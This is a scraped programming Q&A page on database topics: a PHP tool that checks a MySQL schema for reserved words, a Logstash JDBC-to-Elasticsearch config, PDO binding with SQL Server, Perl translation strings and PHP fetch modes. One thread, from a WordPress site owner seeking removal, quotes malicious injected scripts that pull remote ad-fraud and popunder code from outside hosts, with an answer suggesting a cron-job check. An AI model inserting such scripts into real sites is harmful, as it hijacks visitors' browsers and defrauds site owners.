Check SQL schema for reserved words and find suitable replacement - mysql

Wasted many hours troubleshooting my DB which included maxValue as a column name. I've since discovered it was a reserved word.
I've used type and timestamp with both MySQL and MariaDB without issues, but I've learned my lesson, and will never do so again (MySQL shows both as being reserved, yet MariaDB only shows timestamp and even says its still okay to use).
Is there some sort of online tool which will check the schema using the SQL dump or create SQL for reserved words?
Is there any resource or strategy showing typical replacement words. I suppose I can make them plural but doing so goes against my personnel standard.

For what it is worth, here is a tool...
Note that mysql.help_keyword is not being supported with MariaDB 10.2.7, and I had to hardcode the reserved words.
<?php
error_reporting(E_ALL);
ini_set('display_startup_errors', 1);
ini_set('display_errors', 1);
openlog('API', LOG_NDELAY, LOG_LOCAL2);
if ($_SERVER['REQUEST_METHOD'] == 'POST' && !empty($_POST['database'])) {
$db=parse_ini_file(__DIR__.'/../config.ini',true)['mysql'];
$pdo=new PDO("mysql:host={$db['host']};dbname={$db['dbname']};charset={$db['charset']}",$db['username'],$db['password'],array(PDO::ATTR_EMULATE_PREPARES=>false,PDO::MYSQL_ATTR_USE_BUFFERED_QUERY=>true,PDO::ATTR_ERRMODE=>PDO::ERRMODE_EXCEPTION,PDO::ATTR_DEFAULT_FETCH_MODE=>PDO::FETCH_OBJ));
$error=['tableHelper'=>[],'columnHelper'=>[],'tableMdbReserved'=>[],'columnMdbReserved'=>[],'tableMdbException'=>[],'columnMdbException'=>[]];
$stmt=$pdo->query('SELECT name FROM mysql.help_keyword');
$reserved=$stmt->fetchAll(PDO::FETCH_COLUMN);
$mdbReserved=['ACCESSIBLE','ADD','ALL','ALTER','ANALYZE','AND','AS','ASC','ASENSITIVE','BEFORE','BETWEEN','BIGINT','BINARY','BLOB','BOTH','BY','CALL','CASCADE','CASE','CHANGE','CHAR','CHARACTER','CHECK','COLLATE','COLUMN','CONDITION','CONSTRAINT','CONTINUE','CONVERT','CREATE','CROSS','CURRENT_DATE','CURRENT_TIME','CURRENT_TIMESTAMP','CURRENT_USER','CURSOR','DATABASE','DATABASES','DAY_HOUR','DAY_MICROSECOND','DAY_MINUTE','DAY_SECOND','DEC','DECIMAL','DECLARE','DEFAULT','DELAYED','DELETE','DESC','DESCRIBE','DETERMINISTIC','DISTINCT','DISTINCTROW','DIV','DOUBLE','DROP','DUAL','EACH','ELSE','ELSEIF','ENCLOSED','ESCAPED','EXISTS','EXIT','EXPLAIN','FALSE','FETCH','FLOAT','FLOAT4','FLOAT8','FOR','FORCE','FOREIGN','FROM','FULLTEXT','GENERAL','GRANT','GROUP','HAVING','HIGH_PRIORITY','HOUR_MICROSECOND','HOUR_MINUTE','HOUR_SECOND','IF','IGNORE','IGNORE_SERVER_IDS','IN','INDEX','INFILE','INNER','INOUT','INSENSITIVE','INSERT','INT','INT1','INT2','INT3','INT4','INT8','INTEGER','INTERVAL','INTO','IS','ITERATE','JOIN','KEY','KEYS','KILL','LEADING','LEAVE','LEFT','LIKE','LIMIT','LINEAR','LINES','LOAD','LOCALTIME','LOCALTIMESTAMP','LOCK','LONG','LONGBLOB','LONGTEXT','LOOP','LOW_PRIORITY','MASTER_HEARTBEAT_PERIOD','MASTER_SSL_VERIFY_SERVER_CERT','MATCH','MAXVALUE','MEDIUMBLOB','MEDIUMINT','MEDIUMTEXT','MIDDLEINT','MINUTE_MICROSECOND','MINUTE_SECOND','MOD','MODIFIES','NATURAL','NOT','NO_WRITE_TO_BINLOG','NULL','NUMERIC','ON','OPTIMIZE','OPTION','OPTIONALLY','OR','ORDER','OUT','OUTER','OUTFILE','PARTITION','PRECISION','PRIMARY','PROCEDURE','PURGE','RANGE','READ','READS','READ_WRITE','REAL','RECURSIVE','REFERENCES','REGEXP','RELEASE','RENAME','REPEAT','REPLACE','REQUIRE','RESIGNAL','RESTRICT','RETURN','REVOKE','RIGHT','RLIKE','ROWS','SCHEMA','SCHEMAS','SECOND_MICROSECOND','SELECT','SENSITIVE','SEPARATOR','SET','SHOW','SIGNAL','SLOW','SMALLINT','SPATIAL','SPECIFIC','SQL','SQLEXCEPTION','SQLSTATE','SQLWARNING','SQL_BIG_RESULT','SQL_CALC_FOUND_ROWS','SQL_SMALL_RESULT','SSL','STARTING','STRAIGHT_JOIN','TABLE','TERMINATED','THEN','TINYBLOB','TINYINT','TINYTEXT','TO','TRAILING','TRIGGER','TRUE','UNDO','UNION','UNIQUE','UNLOCK','UNSIGNED','UPDATE','USAGE','USE','USING','UTC_DATE','UTC_TIME','UTC_TIMESTAMP','VALUES','VARBINARY','VARCHAR','VARCHARACTER','VARYING','WHEN','WHERE','WHILE','WITH','WRITE','XOR','YEAR_MONTH','ZEROFILL'];
$mdbExceptions=['ACTION','BIT','DATE','ENUM','NO','TEXT','TIME','TIMESTAMP'];
$stmt=$pdo->prepare('SELECT UPPER(TABLE_NAME) tn, UPPER(COLUMN_NAME) cn from information_schema.columns WHERE table_schema = ?');
$stmt->execute([$_POST['database']]);
while($rs=$stmt->fetch()) {
if(in_array($rs->tn,$reserved)) {
$error['tableHelper'][]=$rs->tn;
}
if(in_array($rs->cn,$reserved) && !in_array($rs->cn,$error['columnHelper'])) {
$error['columnHelper'][]=$rs->cn;
}
if(in_array($rs->tn,$mdbReserved)) {
$error['tableMdbReserved'][]=$rs->tn;
}
if(in_array($rs->cn,$mdbReserved) && !in_array($rs->cn,$error['columnMdbReserved'])) {
$error['columnMdbReserved'][]=$rs->cn;
}
if(in_array($rs->tn,$mdbExceptions)) {
$error['tableMdbException'][]=$rs->tn;
}
if(in_array($rs->cn,$mdbExceptions) && !in_array($rs->cn,$error['columnMdbException'])) {
$error['columnMdbException'][]=$rs->cn;
}
}
echo('<pre>'.print_r($error,1).'</pre>');
}
else {
echo <<<EOT
<form method="post">
Database Name: <input type="text" name="database"><br>
<input type="submit">
</form>
EOT;
}
Output:
Array
(
[tableHelper] => Array
(
)
[columnHelper] => Array
(
[0] => TYPE
[1] => NAME
[2] => TIMESTAMP
[3] => OFFSET
[4] => VALUE
[5] => STATUS
[6] => PORT
)
[tableMdbReserved] => Array
(
)
[columnMdbReserved] => Array
(
[0] => MAXVALUE
)
[tableMdbException] => Array
(
)
[columnMdbException] => Array
(
[0] => TIMESTAMP
)
)

Related

How to migrate Mysql data to elasticsearch using logstash

I need a brief explanation of how can I convert MySQL data to Elastic Search using logstash.
can anyone explain the step by step process about this
This is a broad question, I don't know how much you familiar with MySQL and ES. Let's say you have a table user. you may just simply dump it as csv and load it at your ES will be good. but if you have a dynamic data, like the MySQL just like a pipeline, you need to write a Script to do those stuff. anyway you can check the below link to build your basic knowledge before you ask How.
How to dump mysql?
How to load data to ES
Also, since you probably want to know how to covert your CSV to json file, which is the best suite for ES to understand.
How to covert CSV to JSON
You can do it using the jdbc input plugin for logstash.
Here is a config example.
Let me provide you with a high level instruction set.
Install Logstash, and Elasticsearch.
In Logstash bin folder copy jar ojdbc7.jar.
For logstash, create a config file ex: config.yml
#
input {
# Get the data from database, configure fields to get data incrementally
jdbc {
jdbc_driver_library => "./ojdbc7.jar"
jdbc_driver_class => "Java::oracle.jdbc.driver.OracleDriver"
jdbc_connection_string => "jdbc:oracle:thin:#db:1521:instance"
jdbc_user => "user"
jdbc_password => "pwd"
id => "some_id"
jdbc_validate_connection => true
jdbc_validation_timeout => 1800
connection_retry_attempts => 10
connection_retry_attempts_wait_time => 10
#fetch the db logs using logid
statement => "select * from customer.table where logid > :sql_last_value order by logid asc"
#limit how many results are pre-fetched at a time from the cursor into the client’s cache before retrieving more results from the result-set
jdbc_fetch_size => 500
jdbc_default_timezone => "America/New_York"
use_column_value => true
tracking_column => "logid"
tracking_column_type => "numeric"
record_last_run => true
schedule => "*/2 * * * *"
type => "log.customer.table"
add_field => {"source" => "customer.table"}
add_field => {"tags" => "customer.table" }
add_field => {"logLevel" => "ERROR" }
last_run_metadata_path => "last_run_metadata_path_table.txt"
}
}
# Massage the data to store in index
filter {
if [type] == 'log.customer.table' {
#assign values from db column to custom fields of index
ruby{
code => "event.set( 'errorid', event.get('ssoerrorid') );
event.set( 'msg', event.get('errormessage') );
event.set( 'logTimeStamp', event.get('date_created'));
event.set( '#timestamp', event.get('date_created'));
"
}
#remove the db columns that were mapped to custom fields of index
mutate {
remove_field => ["ssoerrorid","errormessage","date_created" ]
}
}#end of [type] == 'log.customer.table'
} #end of filter
# Insert into index
output {
if [type] == 'log.customer.table' {
amazon_es {
hosts => ["vpc-xxx-es-yyyyyyyyyyyy.us-east-1.es.amazonaws.com"]
region => "us-east-1"
aws_access_key_id => '<access key>'
aws_secret_access_key => '<secret password>'
index => "production-logs-table-%{+YYYY.MM.dd}"
}
}
}
Go to bin, Run as
logstash -f config.yml

Backdoor code injection in wordpress database - how to remove - better still how to fix?

Every day or so, backdoor code gets added (injected?) to the end of all the rows in wp_posts - post_content.
Wordfence picks up only the entry cutwin and alerts me - it doesn't clean it. I've also tried other WP anti malware plugins to no effect. All I know how to do at present is neuter it by using WP search&replace on 'cutwin', replacing with 'example', then painstakingly delete the code row by row. With 113 entries in the table, this is slow. My questions are:
1) Can someone give me SQL code that I can put in phpmyadmin to quickly delete it from all rows in wp_posts - post_content? A script that found the first line (see below) and removed that and everything after would do the trick, but I don't know myself how to code it.
2) Does anyone know what's causing this and how to get rid of it?
Theme: Generatepress
Plugins in use:
Akismet Anti Spam,
Anti-Malware Security and Brute-Force Firewall,
Better Search Replace,
Elementor,
Elementor Pro,
GP Premium,
Superfly Menu,
UpdraftPlus - Backup/Restore,
Use Any Font,
Wordfence Security,
WP Crontrol,
WP Rocket,
WP Smush,
WP-Sweep
The malicious code follows.
Many thanks,
Michael
<script type="text/javascript">
var adlinkfly_url = 'https://cutwin.com/';
var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
var adlinkfly_advert = 2;
var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
</script>
<script src='//cutwin.com/js/full-page-script.js'></script>
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
Since the cutwin script is being injected periodically the first thing I would suspect is that the malware is using a cron job to do the injection. The cron jobs are stored in the wp_options table with option_name 'cron'. Unfortunately, this is a serialized value and is very hard to read directly. However, you can create a simple PHP script to unserialize it.
<?php
require('wp-load.php');
var_dump( get_option( 'cron' ) );
?>
I would save this in the root directory (where wp-load.php is found) and run it from your browser. The ouput looks like this:
Array
(
[1522826738] => Array
(
[delete_expired_transients] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
[1522826996] => Array
(
[wp_update_plugins] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
[wp_update_themes] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
[wp_version_check] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
)
[1522827110] => Array
(
[wp_scheduled_delete] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
[1522828797] => Array
(
[wp_scheduled_auto_draft_delete] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
where 'delete_expired_transients', 'wp_update_plugins', 'wp_update_themes', ... are the names of PHP functions to run periodically. Check that all of these functions are reasonable. If the malware programmer is skilled he/she would use something more hidden but you should check that there are no strange cron jobs.

Tried to bind parameter number 0. SQL Server supports a maximum of 2100 parameters

I'm currently using a PDO class that works on MySQL perfectly. But when it comes to MSSQL , I get an error when I try to insert data via the bindValue() function.
I'm using this method for data binding:
bindValue(":param",$value)
Step 1 - Create an array for the table fields in the query
$counter = 0;
foreach($fields as $cols)
{
$fieldBind[$counter] = ":".$cols;
$new_f = $new_f ."". $cols;
$counter ++;
if($counter!=count($fields))
{
$new_f = $new_f.",";
}
}
output : (
[0] => :field1
[1] => :field2
[2] => :field3
)
Step 2 - Create an array for the data of the fields in the query
$counter2 = 0;
foreach($data as $cols)
{
$dataBind[$counter2] = $cols;
$new_d = $new_d."'".$cols."'";
$counter2 ++;
if($counter2!=count($data))
{
$new_d = $new_d.",";
}
}
output : ( [0] => value1 [1] => value2 [2] => value3 )
Step 3 - Prepare the query via the query function
parent::query("INSERT INTO $table($new_f) VALUES($new_d)");
Step 4 - Bind the Parameters and Values
for($i=0;$i<count($data);$i++){
parent::bind($fieldBind[$i],$dataBind[$i]);
}
The query looks like this:
INSERT INTO table(field1,field2,field3) values(':value1',':value2',':value3')
Step 5 - Execute the Query
try {
parent::execute();
return parent::rowCount();
}
catch(PDOException $e) {
echo $e->getMessage();
}
This method works perfectly on MySQL, but when I try to execute this on SQL Server, I get this error:
SQLSTATE[IMSSP]: Tried to bind parameter number 0. SQL Server supports a maximum of 2100 parameters.
Try removing the apostrophe ''
from :
INSERT INTO table(field1,field2,field3) values(':value1',':value2',':value3')
to the following:
INSERT INTO table(field1,field2,field3) values(:value1,:value2,:value3)

Replace variables extracted from database with theirs values

I'd like to translate a perl web site in several languages. I search for and tried many ideas, but I think the best one is to save all translations inside the mySQL database. But I get a problem...
When a sentence extracted from the database contains a variable (scalar), it prints on the web page as a scalar:
You have $number new messages.
Is there a proper way to reassign $number its actual value ?
Thank you for your help !
You can use printf format strings in your database and pass in values to that.
printf allows you to specify the position of the argument so only have know what position with the list of parameters "$number" is.
For example
#!/usr/bin/perl
use strict;
my $Details = {
'Name' => 'Mr Satch',
'Age' => '31',
'LocationEn' => 'England',
'LocationFr' => 'Angleterre',
'NewMessages' => 20,
'OldMessages' => 120,
};
my $English = q(
Hello %1$s, I see you are %2$s years old and from %3$s
How are you today?
You have %5$i new messages and %6$i old messages
Have a nice day
);
my $French = q{
Bonjour %1$s, je vous vois d'%4$s et âgés de %2$s ans.
Comment allez-vous aujourd'hui?
Vous avez %5$i nouveaux messages et %6$i anciens messages.
Bonne journée.
};
printf($English, #$Details{qw/Name Age LocationEn LocationFr NewMessages OldMessages/});
printf($French, #$Details{qw/Name Age LocationEn LocationFr NewMessages OldMessages/});
This would be a nightmare to maintain so an alternative might be to include an argument list in the database:
#!/usr/bin/perl
use strict;
sub fetch_row {
return {
'Format' => 'You have %i new messages and %i old messages' . "\n",
'Arguments' => 'NewMessages OldMessages',
}
}
sub PrintMessage {
my ($info,$row) = #_;
printf($row->{'Format'},#$info{split(/ +/,$row->{'Arguments'})});
}
my $Details = {
'Name' => 'Mr Satch',
'Age' => '31',
'LocationEn' => 'England',
'LocationFr' => 'Angleterre',
'NewMessages' => 20,
'OldMessages' => 120,
};
my $row = fetch_row();
PrintMessage($Details,$row)

return only column name values from mysql table

sorry but i didn't knew how to explain the question in on sentence...
actually i have code like this when i do mysql_fetch_array...
[0] => 10
[id] => 10
[1] => 58393
[iid] => 58393
[2] => 0
[ilocationid] => 0
[3] => 38389
[iapptid] => 38389
[4] => 2012-06-30T00:00:00
[ddate] => 2012-06-30T00:00:00
[5] => 1000
[ctimeofday] => 1000
but i want to return something like this
[id] => 10
[iid] => 58393
[ilocationid] => 0
[iapptid] => 38389
[ddate] => 2012-06-30T00:00:00
[ctimeofday] => 1000
i mean without the numeric representatives of the columns. how do i do it...please help...
As explained in the manual for PHP's mysql_fetch_array() function:
The type of returned array depends on how result_type is defined. By using MYSQL_BOTH (default), you'll get an array with both associative and number indices. Using MYSQL_ASSOC, you only get associative indices (as mysql_fetch_assoc() works), using MYSQL_NUM, you only get number indices (as mysql_fetch_row() works).
Therefore, you want either:
mysql_fetch_array($result, MYSQL_ASSOC);
or
mysql_fetch_assoc($result);
Note however the warning:
Use of this extension is discouraged. Instead, the MySQLi or PDO_MySQL extension should be used. See also MySQL: choosing an API guide and related FAQ for more information. Alternatives to this function include:
mysqli_fetch_array()
PDOStatement::fetch()